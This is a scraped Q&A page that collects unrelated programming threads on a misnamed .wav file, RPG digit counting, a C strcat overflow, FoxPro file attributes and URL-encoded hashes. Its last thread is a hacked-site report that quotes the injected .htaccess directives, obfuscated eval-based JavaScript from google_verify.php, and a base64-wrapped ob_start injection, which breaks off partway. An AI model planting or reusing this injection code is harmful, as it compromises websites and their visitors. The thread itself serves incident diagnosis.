Is there any tool that helps with fixing a .wav file header other than Audacity?
The file is playing pure noise on audacity and doesn't open in other applications at all.
I believe the header is corrupted and not sure which value to use for "offset".
Here is a sample file: .wav corrupted file download 4 mgb
Here is another file just to confirm:
Another corrupted .wav file 35 mgb
To get a grip on an unknown binary file its always good advice to pop it open using a hex editor ... https://www.wxhexeditor.org/
The file looks to be a binary dump of some web page ... notice the right column showing HTML
or issue this terminal command to render each byte in boolean and its ASCII counterpart
xxd -b name_of_given_binary_file
00000000: 00111100 00100001 01000100 01001111 01000011 01010100 <!DOCT
00000006: 01011001 01010000 01000101 00100000 01101000 01110100 YPE ht
0000000c: 01101101 01101100 00111110 00001010 00111100 00100001 ml>.<!
00000012: 00101101 00101101 01011011 01101001 01100110 00100000 --[if
00000018: 01101100 01110100 01100101 00100000 01001001 01000101 lte IE
0000001e: 00100000 00111000 01011101 00111110 00111100 01101000 8]><h
00000024: 01110100 01101101 01101100 00100000 01100011 01101100 tml cl
0000002a: 01100001 01110011 01110011 00111101 00100010 01101110 ass="n
00000030: 01100111 00101101 01100011 01110011 01110000 00100000 g-csp
od -a name_of_given_binary_file # octal dump is handy here too
0000000 < ! D O C T Y P E sp h t m l > nl
0000020 < ! - - [ i f sp l t e sp I E sp 8
0000040 ] > < h t m l sp c l a s s = " n
0000060 g - c s p sp i e sp i e 8 sp l t e
Related
I am having an issue with coding this, I need some similar code with this but written in RPG to count the digits in a number.
NumField (15, 0) packed decimal
EVAL numDig = %len(%trim(%char(NumField)))
the %editc built in function dates back to the begin of time. So does %len, %trim and varying fields.
** ---------------------- test0003r ---------------------------
dtest0003r pi
d errmsg s 256a
d packNum s 15p 0
d lx s 10i 0
d v20 s 20a varying
d ch50 s 50a
/free
packNum = 32553;
v20 = %trim(%editc(packNum:'Z')) ;
lx = %len(v20) ;
ch50 = %trim(%editc(lx:'Z')) + ' ' + v20 ;
dsply ch50 ;
*inlr = '1' ;
return ;
/end-free
A fun challenge.
#zen, I agree with others. I would not try to code this in RPG III. I would either convert the RPG III program to RPG IV, or I would call an RPG IV program to do this calculation.
But here is some RPG III code that gets the number of digits. It is horrible code, and almost completely untested. I would never use this code or recommend that anyone else use this code.
C Z-ADD1.2 NUM 52
C EXSR SUB1
C Z-ADD-123.45 NUM 52
C EXSR SUB1
C Z-ADD0 NUM 52
C EXSR SUB1
C RETRN
C SUB1 BEGSR
C MOVELNUM STR 30 P
C '0':' ' XLATESTR STR2 30 P
C ' ' CHECKSTR2 P 50
C P IFGT 0
C SUBSTSTR2:P STR3 30 P
C ' ' CHEKRSTR3 P 50
C ENDIF
C P DSPLY
C ENDSR
It displays 2, 5, 0.
I am using Arch Linux and when I am compiling and running the following C code,
#include <stdio.h>
#include<string.h>
int main(void) {
char s1[]="Hello";
char s2[]="World";
strcat(s1,s2);
int s2_len=strlen(s2);
printf("s1 = %s, s2 = %s and length of s2 = %d.\n", s1, s2, s2_len);
return 0;
}
I am getting the output:
s1 = HelloWorld, s2 = orld and length of s2 = 4.
Although the output shoud be s1 = HelloWorld, s2 = World and length of s2 = 5. and it is the output when I am using some online IDE.
Can somebody explain me why is this happening?
char s1[]="Hello";
char s2[]="World";
strcat(s1,s2);
The variable declarations allocate memory for 5 characters each, plus the terminating NUL byte. Your strcat call writes past that space, which produces undefined results.
In this case, the memory layout is probably something like this
0 1 2 3 4 5 6 7 8 9 10 11
H e l l o \0 W o r l d \0
^ ^
s1 s2
After the strcat, the result is:
0 1 2 3 4 5 6 7 8 9 10 11
H e l l o W o r l d \0 \0
^ ^
s1 s2
Which gives the result you see. Note that there could be other possible results, the program could e.g. crash at the strcat call.
Hoping to use a windows shell API call that can accept wild cards to change attributes programmatically. Utmost thanks/blessings for any/all thoughts.
Borrowing code from http://www.resolvinghere.com/sm/how-do-i-change-an-attribute-of-a-file-from-within-a-visual-foxpro-program.shtml
RUN /N ATTRIB +H "c:\test.txt" && Hidden causes dos window to noise itself
RUN /N ATTRIB -H "c:\test.txt" && UnHidden
Tom recalled this ... but it does not take wild-cards:
*------------CHAR-------HEX------------------BIN---------NUM
* READONLY R 0x00000001 00000000 00000001 1
* HIDDEN H 0x00000002 00000000 00000010 2
* SYSTEM S 0x00000004 00000000 00000100 4
* DIRECTORY D 0x00000010 00000000 00010000 16
* ARCHIVE A 0x00000020 00000000 00100000 32
* NORMAL N 0x00000080 00000000 10000000 128
* TEMPORARY T 0x00000100 00000001 00000000 256
* COMPRESS C 0x00000800 00001000 00000000 2048
* NOINDEX I 0x00002000 00100000 00000000 8192
* CHIPHER P 0x00004000 01000000 00000000 16384
* ERROR 0xFFFFFFFF REPL("1",32) 4294967295
* ----------------------------------------------------------------------
LPARAMETER vFilename as String, vNewAttribute as String
LOCAL liFlag as Integer, llResult, liAttributes, lnNewAttribute, cDummy, nBitPos, cBitMap
DECLARE INTEGER SetFileAttributes IN Win32API STRING, INTEGER
DECLARE INTEGER GetFileAttributes IN Win32API STRING
llResult = .F.
IF !EMPTY(vFilename)
IF VARTYPE(vNewAttribute) = [C]
lnNewAttribute = 0
* 1234567890123456
cBitMap = [RHS DA NT C IP ]
FOR i = 1 TO LEN(vNewAttribute)
cDummy = SUBSTR(vNewAttribute,i,1)
nBitPos = AT(cDummy,cBitMap)
IF nBitPos > 0
lnNewAttribute = BITSET(lnNewAttribute, nBitPos -1 )
ENDIF
ENDFOR
ELSE
lnNewAttribute = vNewAttribute
ENDIF
liAttributes = GetFileAttributes(vFilename)
IF (liAttributes # -1)
lnNewAttribute = BITXOR(liAttributes, lnNewAttribute)
llResult = (SetFileAttributes(vFilename, lnNewAttribute) = 1 )
ENDIF
ENDIF
RETURN llResult
Of course RUN ... should not be one of your selections to accomplish a procedure where you don't need to shell to DOS at all.
Your question is two fold:
How do get a list of files using a wildcard + in all subdirectories.
For this one you can use a bunch of alternatives such as FileSystemObject, Adir() or Filer.dll that ships with VFP and maybe more. Here I will sample with the Filer.dll (which is also the DLL used in HOME()+'tools\filer\filer.scx' ). Here is one enhanced wildcard match using filer:
*GetTree.prg
Lparameters tcStartDir,tcSkeleton,tcCursorName,;
tlSubfolders,;
tlWholeWords,tlIgnoreCase,tlSearchAnd,tcSearch1,tcSearch2,tcSearch3
Create Cursor (m.tcCursorName) ;
(filepath m, filename m, ;
FileSize i, fattr c(8), createtime T, lastacc T, lastwrite T)
Local oFiler, lnFound
oFiler = Createobject('filer.fileutil')
With m.oFiler
.SearchPath = m.tcStartDir
.FileExpression = m.tcSkeleton && Search for skeleton
.Subfolder = Iif(m.tlSubfolders,1,0) && Check subfolders
.IgnoreCase = Iif(m.tlIgnoreCase,1,0)
.WholeWords = Iif(m.tlWholeWords,1,0)
.SearchAnd = Iif(m.tlSearchAnd,1,0)
.SearchText1 = Iif(Empty(m.tcSearch1),"",m.tcSearch1)
.SearchText2 = Iif(Empty(m.tcSearch2),"",m.tcSearch2)
.SearchText3 = Iif(Empty(m.tcSearch3),"",m.tcSearch3)
lnFound = .Find(0)
For ix=1 To m.lnFound
With .Files(m.ix)
If !(Bittest(.Attr,4) And .Name = '.')
Insert Into (m.tcCursorName) ;
(filepath, filename, FileSize, fattr, createtime, lastacc, lastwrite) ;
values ;
(.Path, .Name, .Size, Attr2Char(.Attr), ;
Num2Time(.Datetime), Num2Time(.LastAccessTime), Num2Time(.LastWriteTime))
Endif
Endwith
Endfor
Endwith
Return m.lnFound
Function Num2Time
Lparameters tnFloat
Return Dtot({^1899/12/30}+Int(m.tnFloat))+86400*(m.tnFloat-Int(m.tnFloat))
Function Attr2Char
Lparameters tnAttr
Return ;
IIF(Bittest(m.tnAttr,0),'RO','RW')+;
IIF(Bittest(m.tnAttr,1),'H','_')+;
IIF(Bittest(m.tnAttr,2),'S','_')+;
IIF(Bittest(m.tnAttr,4),'D','_')+;
IIF(Bittest(m.tnAttr,5),'A','_')+;
IIF(Bittest(m.tnAttr,6),'E','_')+;
IIF(Bittest(m.tnAttr,7),'N','_')
How do I set the attributes.
If you are not after those fancy attributes, that are rarely used, here is the function I have written for myself:
*SetFAttributes.prg
lparameters tcFileName, tlReadOnly, tlHidden, tlSystem
#define FILE_ATTRIBUTE_READONLY 0x00000001
#define FILE_ATTRIBUTE_HIDDEN 0x00000002
#define FILE_ATTRIBUTE_SYSTEM 0x00000004
local lnNewAttr
lnNewAttr = iif(m.tlReadonly,FILE_ATTRIBUTE_READONLY,0)+;
iif(m.tlHidden,FILE_ATTRIBUTE_HIDDEN,0)+;
iif(m.tlSystem,FILE_ATTRIBUTE_SYSTEM,0)
declare integer SetFileAttributes in Win32API ;
string # lpFileName, integer dwFileAttributes
declare integer GetFileAttributes in Win32API ;
string # lpFileName
return ( SetFileAttributes(#tcFilename, ;
bitor(bitand(GetFileAttributes(#tcFilename),0xFFFFFFF8),m.lnNewAttr)) = 1)
Having the above prg files on hand, lets say you want to set all .txt files under c:\MyFolder and its subfolders to readonly, (not hidden, not system) you would be doing this:
Local lcFileName
GetTree('c:\MyFolder','*.txt', 'myCursor', .T.)
Select myCursor
scan for Atc('D',fAttr) = 0
lcFileName = Addbs(Trim(FilePath))+Trim(FileName)
SetFAttributes(m.lcFileName, .T., .F., .F.)
endscan
I am a bit out of my comfort zone here, so I'm not even sure I'm aproaching the problem appropriately. Anyhow, here goes:
So I have a problem where I shall hash some info with sha1 that will work as that info's id.
when a client wants to signal what current info is being used, it sends a percent-encoded sha1-string.
So one example is, my server hashes some info and gets a hex representation like so:
44 c1 b1 0d 6a de ce 01 09 fd 27 bc 81 7f 0e 90 e3 b7 93 08
and the client sends me
D%c1%b1%0dj%de%ce%01%09%fd%27%bc%81%7f%0e%90%e3%b7%93%08
Removing the % we get
D c1 b1 0dj de ce 01 09 fd 27 bc 81 7f 0e 90 e3 b7 93 08
which matches my hash except for the beginning D and the j after the 0d, but replacing those with their ascii hex no, we have identical hash.
So, as I have read and understood the urlencoding, the standard would allow a client to send the D as either D or %44? So different clients would be able to send different representations off the same hash, and I will not be able to just compare them for equality?
I would prefer to be able to compare the urlencoded strings as they are when they are sent, but one way to do it would be to decode them, removing all '%' and get the ascii hex value for whatever mismatch I get, much like the D and the j in my above example.
This all seems to be a very annoying way to do things, am I missing something, please tell me I am? :)
I am doing this in node.js but I suppose the solution would be language/platform agnostic.
I made this crude solution for now:
var unreserved = 'A B C D E F G H I J S O N K L M N O P Q R S T U V W X Y Za b c d e f g h i j s o n k l m n o p q r s t u v w x y z + 1 2 3 4 5 6 7 8 9 0 - _ . ~';
function hexToPercent(hex){
var index = 0,
end = hex.length,
delimiter = '%',
step = 2,
result = '',
tmp = '';
if(end % step !== 0){
console.log('\'' + hex + '\' must be dividable by ' + step + '.');
return result;
}
while(index < end){
tmp = hex.slice(index, index + step);
if(unreserved.indexOf(String.fromCharCode('0x' + tmp)) !== -1){
result = result + String.fromCharCode('0x' + tmp);
}
else{
result = result + delimiter + tmp;
}
index = index + step;
}
return result;
}
Couple days ago I had problems with my sites. In all ftp servers I got some php file called google_verify.php and in my .htaccess file the following text was added:
<IfModule mod_php5.c>
php_value auto_append_file "google_verify.php"
</IfModule>
<IfModule mod_php4.c>
php_value auto_append_file "google_verify.php"
</IfModule>
Here is google_verify.php file:
<script>d='function $M(file -z ?P L-B="GE <= a ,rt="" Ke ,E=tru & ,r.offset=100 Un
L-L #u #y #J LA9 N ,e #q LA9 N Um L-n ],P ]Urg L-k(); .sxml2 X1 A.icrosoft X2
-z=null}}if(! z Ztypeof M!="undefined" -z : M ]+ E= 4}} Uc _> -t[ $o [>,false) Uv
_>, =vars Z 4== =vars A= /( % $o), % >)) + t[ % $o) [% >) W} UH L$p, $S A$T= %
Yx);regexp :RegExp( Yx+"|"+ $T); H/ Sp 6regexp) Ii=0;i< H/ hj= H/[i] 6"=");if( 4= SS
-v G + c G}}}; a.trim _$f Z"qabcdef".indexOf( $o.substr(0,1))>=0){ H $rs So 6\'q\')
8\'\') 6\'v\') I Hi=0;i< $rs hrs[i]=parseInt( $rs[i],16)- k = $rs 8\',\')+
\',\'}else{ajax gr.offset2=25; = k}; 9unR ( !){eval( 9 ]UrN L db&& Yt 7 -H( Yt W} 3
drt 7 OR + rt SR}} c(" $a",new Date().getTime()); $h : / ]Ikey in( t) Zfalse== C1]&&
4== b A$T= v(key, C0] W ,t[key] ?t[ $T[0] [$T[1] W;key ST[0]} $h[ $h 7]=key+"="+
C0]} 3$R Oh 8 Yx) + rt+ Sh 8 Yx)} Uk L-B="POS <t="";d=\'v={# VM$1XH:"e-",#
V`$1XH:"",*b VM$1Xv30:"l(\\\'l=Str"
\\\\_:"ing.fr",JG*2%a%fzV*aV:"omCha",>%8%8*2*5LB0_*4:"rCode("
<6#fF%3#f#7#d_$4y<d*3*6$eV*e*d$a*3&6R8#b!0G%4#d%eTM `8B6P*3K#6>*4HY/c*dPB1JJ-
a$4*6&9<7E*bQ`NX#U&3W2E*eQ*4?Q*2E&7W5!3%b#e#8!0*8#6J `6PV#c#9!fB3*1V&6W9*7#f%6-3*d#f-
d-fy,a2%2#e T T#c!1&1/b#eT!1#c!1*4*b-d&1/4-f#f%6%2#d
^5`y<4?T*5KUB6P*3Y/9*eZw*5#a#9A*7&9/1#U TLP
T&1D3HK%8>O#w*5Y/9O~T##6T#~&9D1ZwJB6A*eZG&9,d5H*3#8#7E*5?%8&7/d-eF!fJ-eFG%6y
/6B0!2G_%3#f_%3yD0%1EJ%1EHwA&5,d0#$f!2#e$1MX?yD1*9U%aAGA*9A&9,a2#7G-a?*1-bM?I
/1-0-7%4%1$4T#d-c `9J?%8J%3AGE&7Df*e!0*cZA#b!3*2
`aH-aOB7B7OJGI<2?GJ#aPP?$e&1W5%4z$1*7Gz$1*5I/3*4#d*0!3`!0F!0 `8$dO%6`
%4$4%b!f&5D4OOOB0#eVN-1&3W0*3$b!3*b*aw*0$b&3De%a#UB0#e-dN-1&3W2>M-
3*0K*2*5_&5WeOA%7*3#6-7%e*3&6/4%7!fN f&1,a6M$f_*b#7B1B1#7&5D7#f%a$3XUFPZ
e9QMAU$1JB4U&9Wf*5*8#$1>U>#YR1
%4Q%6%4UQ%6#7&9Rb$f%fzB3B7*5?*fI/9$1*4#eUUA$1*2&6D6^F#8~#b%0%0F ea%7%eN%7!2
^7?y/5Z#e#b$e$e_Z*0yD6~GF#8^#c%0%0&4D9#8O>HB5>*d#Y<9*5*5#8>*6>>#7YW1^??*4B7?*fGI
<7*4#6V*eOA$0V&6/2##d-awA-f#f_yW5!0#b-8*aE-d#d!3&0Wd%8*3%0$e!fT*5#YWeGB7J-
aB2AAH&9<9%7`-b$e|$3-b$b&5R4$b-d$d$4|-d$4$3 j6-9Q$b%e-9w%7X&3,ac%8zK-c$f$b|-c&6R4%aM-
dN%aB1-d%e j7$a?U-4Q!3!3?&3<2-7%3-7%4-7T-7%6&1,af%f-f$0-f$1-f$3-f&9R3%0N%0X%0M%0`I,acN-
cX-cM-c`-c&6Rc-f$d-f$e-f$f-fB0&9,ac$e-c$f-cB0G!f-
7&6,a0FF#7H#6H^H&4D9P#aP#bP#cP#d&5D2#f!f*1A`$a*3*6&6/4-4GF%6GF*fG&1
/4T!1_AAAF*f&1D3H#KJ#-bPPYD2!f?KT?-aHP&7/6%7ULV-6UB0-4&3R5!fV$d!fV$4!fV&3<7P>$a-
6MM_*b&5RczPJ^#b!3N#d `8M|G-d$bU%2P&5,a9*b>-eG-9%8>-e&1/fV%4ULVNN#e&3/6N*0VQ-
e!3>*4&3W3 ^4#8^#E~#8y<2H>$4%0_?*6*6&5/b#e#e~ ^4_$4zy<0#eV$d*0!3#c#6!3&3W4OJ#-
fG!2#b#6y/2*4OJ#-f#d_$3yW2_^*fU%2H_#7&5/8M$fL%2H_^*f&5/a%0G!3^VN$dU&3<6*4A-
4#fJL#b*0&9D1T*3#-a*5>-3>YD9#9#bH%4-8|$a*4 j5*2#b#6*2#f#6*1#eID0#b#8H#d#6H^#b
ed#9OG#8~G#9P&1D3#a#7O#f#9O#e#e&7/dO#6GJJGJP&1D5#a#9^#f#a^#a#a&9
/f#8#9!f#8#8!f~~&3D3#c#aO#dO#c#aO&7D9L~LOLJL#6yW0T*3%eM$aH>^Y<d*1~#fZ*0EXM
ea*4*5$3^^OB5GIR4N-d%b-f#f-5X$4y<e$3KO%bM$4Q*8&5<b%4N*6Q%7%8#K&3D4U$bz
%4Q%6~#b&9DbHB4E~|*4L%f&7R7M$3#dJJ?LV&3<aO#B2O#|O#YRc^G-c^GB3T%2IWaE-
dGP-d#EL&0<3%fZ!fE#!3Q$3&0D1ZQK$1#??U&3Db!3*3>!0#8*2|*9&0<cH!fK#b!fP~!fYW0%8Z$aF*eFH%0
ec*8*6?#f?$dzZIDd-c!2E#Q#E-c
`6F$bZ%8`K*1^&4D9#9A$1%eQ$0$1$d&9W1#c~*2*0OF#9F&4,a1B1B1#fE*5*1*4E&4<aE#E?-b^%a|
j9T`w*9$0w$1w&4R3|G>%8LB2*0>&5W8*2*5>-2P>NL&5,d1A-3~%f$4$4%b`&6,a0-
c-5-4*5#`B5*3Y/dzB2*7*a?-2*f#I/2*6 ^b ^a*7!2OyD3%7$4w$e*2*2$3$a&5R5NA-
1*5`$e$dP&9/3Q`UJHH!0#&0<2$b*5>*c*3%2$b>YWc*0MN`%8#e-d$a&3W5>#9#6%aMKB1*3Y,ae-8*1F^-
5*c*1E&4W3?A%6%b`A##dy/9*9LA*eJG*2%a&6<aM!1%aT#e TT&1DcT#A-3ZQz|&9<c%1|#a%e%f%eT#b
`2L#d-eF ^f#d_yRf>L-0P-9X>#fYDd ^9*4#f!2#aN*4yRb-6%3w-0%3%f%7?y/7%8T%1%4EA-
bH&0<4-8*dE>N-eE*6 ja!3*f*9U#eV*5!3&3/dNHB4B4B4*2%1|&7Rc*1EXz#fEXz
ee!fA$1$eT?~Z&6<5$4-5-4*3*0%6N%e&0<6MKQ$1#-4#e!3&3/d!3-6EUE-
7L$3&0<dz*9zz$a$1%a$dYRcZH!f$b$a%b!f~Y<1EZ||N#f~~&5<9`$1#6z$f$1zzY<b`~wN$3^#7^&6R5
fHT%2&1<c%fzPZXQ$1*2&3,aeA$0%1GA%0V*a&6D8G%aL-7|`$eQI/fHJ#8B5*b%8$bK&7
/f%3%3LH*5~#8E&7DfF*8A^?!1H!1&1/7*4NK$eE*8|| j4z#!3F*0-0%4M&3R0#6$awXKMNHY/cPMQ-
6MNK$1&3<9?##d_!2V#$dyR7%a|$aM$3_?G&5/f!f-f%eL%4G#7$f&7/5#O%6NN%a$3w&5Wb$0$1$4KH#>HY
/8*cG#9L_#f*0%7&5R6wT%fB1FLF*7&4<b
%0V%1F!fGB1w&4<c$3T$b!0UXw$3&0<9%2wKw$4|#a%8&0R1KKZX>^$ewYR6FFJEK-
fZ%1&4<5*0%7#8$b$f%fzB3ID3_~O%8Z%6M*8&5R8Z%e*a$dP#aA*b&9/9$b!f#V#aUU%f&6D2ZQ%8wz-3%aU
edVV#6AN%1LL&6<1A#aZ`K$eX%e&9R0X!2#7%b%8$4%3%fy<bV#c%a~|%b$a-
b&6,a5*4$fT_$f?L!1&1De*4?*8!fL$a%a| jd$4`#GF#cE-8&4D3K%a|*a$1
%aQ%a&5R6z>*1#M%3H>Y/e#c#c#a#aJ*7*7A&9DeJ$0wQ%b`KF&4W5L-
0$fXX%3%f%bIR4?##d!2#eN%7Xy,aa%f$3%bV*4!fB1A&6<3#f
^1T%3%e%e%4y<aK$4*6%3$bA*bJ&9D1V#8V*9A-1%1%2&6/9?E*b$e$0N%bX&7R7!0*5w%6>!0*6#d
`6XPQwwX%8M&3/8*f#$b#6#>-0PY,d2EE-0^E#c-3X j9KZK>-2>$bzY,d1$4Z*5%4?>-3#Y<2#d!0HXE-
d?!0&0WdE$3%fT#e TU&1/6!3-0*1#fJ%7K|&3W4G!f>*1KN`L&6<5#f#a#9#dT#d%6#fy
/8$4#d%4L$3$0Kw&0R6?A_V*2-3-8-9y<2%4%aB8%6%6???I/5F>FAF?FU
ea~?^?#6?#7?ID7A#8A#bA#dA#9&9/5#6_#a_#b_#c_&5W0>*1>*2>*3>*4Y
/4*2F*3F*6F*7F&4W8F*9F*aF*bF*c
e1*a!1*b!1*c!1*d!1&1,a7P#8$d$fK$d$ezI/9%4L#eA|#e%4#d&1D9#b*7#9*2#aP~B0YD2JJ#7$3`Q
MP&9Re#8$a|$aJOOOIDc%6M%2ZAT?&1\\\\E:"32);ev",*``ZXK*b$0$1:"al(l)
\\\'",EE!0*9Q>!0#8*2:");"};dk=[] I-r x in v){dk.push(trim(x,v))};e-l(dk
8\\\'\\\'))!v7#v8$vc%vb&:8*v9+,q-
va/+7<,b>!8?!a#!bA!9BvdD+8E!7F!4G!dH#0I:90J#2K%cL!eM$7N$5O#3P#1Q$2R,cT%5U!cV!6W+
9X$6Y&8Z%d^#5_!5`$8w%9y&2z$c|$9~#4\\\\,#6^L%2*0>$f*2\' Ic=46;c--;d=(t=d
6\'!#$%&*+-/<>?#ABDEFGHIJKLMNOPQRTUVWXYZ^_`wyz|~\\\\\'[c])) 8t.pop())); 9 (=d K &};
9unAJAX L dE -q ]+ rN( $R); 3 rr -A 2 Yr)} 3 z){ Hself=this; 3 B=="GET" A$K= F+ i+
Yt , R$K W + R F W;try{ z.setRequestHeader("Content-Type","application/x-www-form-
urlencoded" 5){}} z.onreadystatechange !){switch( #z.readyState){case 1: #L 02: #u
03: #y 04: ;= #z.r (Text; ;XML= #z.r (XML; #C[0 Q; #C[1 QText; 3#w){self.r N 3#A A)=
#A.nodeName; ).toLowerCase(); 3)=="input Jselect Joption Jtextarea" A#A. >= ;
+#A.innerHTML= ;}} 3#C[0]=="200" A#J ]+#e()} #rt="";break} Uz.send( Yt)}} Um ],rg()}
a.ajax : $M();try{ H $G 2\' $D\') *c("query", $G gd gf) *F="query.php" *B SG gB gf
*rr=\' $rz\' *L SN *u Sg *y Ss *J Sx; P 5){ P)} this g !=function( #self g $kx_
%encodeURIComponent( &e ,rr ?A ?F=file ,t :Object ],C : /(2) (esponse )elemNodeName
*;ajax g +}else{ ,; - A .try{ z :ActiveXObject("M /Array 0();break;case
2=document.getElementById( 3if( 4true 5)}catch(e 6.split( 7.length 8.join( 9this.r
:=new ;self.r ( <T" ,i="?" ,rx="&" ,r =return >value ?=null , # !){ U A){ C t[key][
G( $j[0], $j[1]) Hvar I;for( J"|| )==" K ,b= 4 ,w=fals L ! MXMLHttpRequest NunR (()}
O -rt+= Yx+ $ Pajax.runAJAX( Q]= #z.status Rz.open( B, S= $ T-d!3 U} , V%b%a#6Q W,
4) X.XMLHTTP" 5 Y r Z){if( []= /( ]() ^!2* _ L$o, `&0/ awindow d$R A3 e&4/
f$3%6%fT$4 g. $ h 7;i++ A$ j&7< k $f[ $o]}';for(c=130;c;d=(t=d.split(' ! # $ % & ( )
* + , - . / 0 2 3 4 5 6 7 8 9 : ; < = > ? # A C G H I J K L M N O P Q R S T U V W X Y
Z [ ] ^ _ ` a d e f g h j k'.substr(c-=(x=c<2?1:2),x))).join(t.pop()));eval(d)</script>
I suspect that my pc is infected with some kind of virus who can read my ftp access parameters from my ftp manager.
Does anybody know something more about this virus and how I can clean my computer?
Thanks in advance
I am no security specialist but one of my sites got the same file. From my limited knowledge and research what happened is that your site got hacked and the google_verify.php file is part of an injection attack.
You should also check other files of you website (specially the index.php/htm/html) and look for:
ob_start("security_update"); function security_update($buffer){return $buffer.base64_decode('PHNjcmlwdD5kPSdmdW5jdGlvbiAgJE0oZmlsZSAteiA/UCBMLUI9IkdFIDw9IGEgLHJ0PSIiIEtlICxFPXRydSAmICxyLm9mZnNldD0xMDAgVW4gTC1MIEB1IEB5IEBKIExBOSBOICxlIEBxIExBOSBOIFVtIEwtbiBdLFAgXVVyZyBMLWsoKTsgLnN4bWwyIFgxIEEuaWNyb3NvZnQgWDIgLXo9bnVsbH19aWYoISAgeiBadHlwZW9mICBNIT0idW5kZWZpbmVkIiAteiA6IE0gXSsgRT0gNH19IFVjIF8+IC10WyAkbyBbPixmYWxzZSkgVXYgXz4sID12YXJzIFogND09ID12YXJzIEE9ICAvKCAlICRvKSwgJSA+KSkgKyB0WyAlICRvKSBbJSA+KSBXfSBVSCBMJHAsICRTIEEkVD0gJSBZeCk7cmVnZXhwIDpSZWdFeHAoIFl4KyJ8IisgJFQpOyBILyBTcCA2cmVnZXhwKSBJaT0wO2k8IEgvIGhqPSBIL1tpXSA2Ij0iKTtpZiggND0gU1MgLXYgRyArIGMgR319fTsgYS50cmltIF8kZiBaInFhYmNkZWYiLmluZGV4T2YoICRvLnN1YnN0cigwLDEpKT49MCl7IEggJHJzIFNvIDZcJ3FcJykgOFwnXCcpIDZcJ3ZcJykgSSBIaT0wO2k8ICRycyBocnNbaV09cGFyc2VJbnQoICRyc1tpXSwxNiktIGsgPSAgJHJzIDhcJyxcJykrXCcsXCd9ZWxzZXthamF4IGdyLm9mZnNldDI9MjU7ID0gIGt9OyA5dW5SICggISl7ZXZhbCggOSAgXVVyTiBMIGRiJiYgWXQgNyAtSCggWXQgV30gMyBkcnQgNyBPUiArIHJ0IFNSfX0gIGMoIiAkYSIsbmV3IERhdGUoKS5nZXRUaW1lKCkpOyAkaCA6IC8gXUlrZXkgaW4oICB0KSBaZmFsc2U9PSBDMV0mJiA0PT0gIGIgQSRUPSAgdihrZXksIEMwXSBXICx0W2tleV0gP3RbICRUWzBdIFskVFsxXSBXO2tleSBTVFswXX0gJGhbICRoIDddPWtleSsiPSIrIEMwXX0gMyRSIE9oIDggWXgpICsgcnQrIFNoIDggWXgpfSBVayBMLUI9IlBPUyA8dD0iIjtkPVwndj17QCBWTSQxWEg6ImUtIixAIFZgJDFYSDoiIiwqYiBWTSQxWHYzMDoibChcXFwnbD1TdHIiXFxcXF86ImluZy5mciIsSkcqMiVhJWZ6ViphVjoib21DaGEiLD4lOCU4KjIqNUxCMF8qNDoickNvZGUoIjw2I2ZGJTMjZiM3I2RfJDR5PGQqMyo2JGVWKmUqZCRhKjMmNlI4I2IhMEclNCNkJWVUTSBgOEI2UCozSyM2Pio0SFkvYypkUEIxSkotYSQ0KjYmOTw3RSpiUWBOWEBVJjNXMkUqZVEqND9RKjJFJjdXNSEzJWIjZSM4ITAqOCM2SiBgNlBWI2MjOSFmQjMqMVYmNlc5KjcjZiU2LTMqZCNmLWQtZnksYTIlMiNlIFQgVCNjITEmMS9iI2VUITEjYyExKjQqYi1kJjEvNC1mI2YlNiUyI2QgXjVgeTw0P1QqNUtVQjZQKjNZLzkqZVp3KjUjYSM5QSo3JjkvMUBVIFRMUCBUJjFEM0hLJTg+T0B3KjVZLzlPflRAIzZUQH4mOUQxWndKQjZBKmVaRyY5LGQ1SCozIzgjN0UqNT8lOCY3L2QtZUYhZkotZUZHJTZ5LzZCMCEyR18lMyNmXyUzeUQwJTFFSiUxRUh3QSY1LGQwQCRmITIjZSQxTVg/eUQxKjlVJWFBR0EqOUEmOSxhMiM3Ry1hPyoxLWJNP0kvMS0wLTclNCUxJDRUI2QtYyBgOUo/JThKJTNBR0UmN0RmKmUhMCpjWkEjYiEzKjIgYGFILWFPQjdCN09KR0k8Mj9HSiNhUFA/JGUmMVc1JTR6JDEqN0d6JDEqNUkvMyo0I2QqMCEzYCEwRiEwIGA4JGRPJTZgJTQkNCViIWYmNUQ0T09PQjAjZVZOLTEmM1cwKjMkYiEzKmIqYXcqMCRiJjNEZSVhQFVCMCNlLWROLTEmM1cyPk0tMyowSyoyKjVfJjVXZU9BJTcqMyM2LTclZSozJjYvNCU3IWZOIGYmMSxhNk0kZl8qYiM3QjFCMSM3JjVENyNmJWEkM1hVRlBaIGU5UU1BVSQxSkI0VSY5V2YqNSo4QCQxPlU+QFlSMSU0USU2JTRVUSU2IzcmOVJiJGYlZnpCM0I3KjU/KmZJLzkkMSo0I2VVVUEkMSoyJjZENl5GIzh+I2IlMCUwRiBlYSU3JWVOJTchMiBeNz95LzVaI2UjYiRlJGVfWioweUQ2fkdGIzheI2MlMCUwJjREOSM4Tz5IQjU+KmRAWTw5KjUqNSM4Pio2Pj4jN1lXMV4/Pyo0Qjc/KmZHSTw3KjQjNlYqZU9BJDBWJjYvMkAjZC1hd0EtZiNmX3lXNSEwI2ItOCphRS1kI2QhMyYwV2QlOCozJTAkZSFmVCo1QFlXZUdCN0otYUIyQUFIJjk8OSU3YC1iJGV8JDMtYiRiJjVSNCRiLWQkZCQ0fC1kJDQkMyBqNi05USRiJWUtOXclN1gmMyxhYyU4ekstYyRmJGJ8LWMmNlI0JWFNLWROJWFCMS1kJWUgajckYT9VLTRRITMhMz8mMzwyLTclMy03JTQtN1QtNyU2JjEsYWYlZi1mJDAtZiQxLWYkMy1mJjlSMyUwTiUwWCUwTSUwYEksYWNOLWNYLWNNLWNgLWMmNlJjLWYkZC1mJGUtZiRmLWZCMCY5LGFjJGUtYyRmLWNCMEchZi03JjYsYTBGRiM3SCM2SF5IJjREOVAjYVAjYlAjY1AjZCY1RDIjZiFmKjFBYCRhKjMqNiY2LzQtNEdGJTZHRipmRyYxLzRUITFfQUFBRipmJjFEM0hAS0pALWJQUFlEMiFmP0tUPy1hSFAmNy82JTdVTFYtNlVCMC00JjNSNSFmViRkIWZWJDQhZlYmMzw3UD4kYS02TU1fKmImNVJjelBKXiNiITNOI2QgYDhNfEctZCRiVSUyUCY1LGE5KmI+LWVHLTklOD4tZSYxL2ZWJTRVTFZOTiNlJjMvNk4qMFZRLWUhMz4qNCYzVzMgXjQjOF5ARX4jOHk8Mkg+JDQlMF8/KjYqNiY1L2IjZSNlfiBeNF8kNHp5PDAjZVYkZCowITMjYyM2ITMmM1c0T0pALWZHITIjYiM2eS8yKjRPSkAtZiNkXyQzeVcyX14qZlUlMkhfIzcmNS84TSRmTCUySF9eK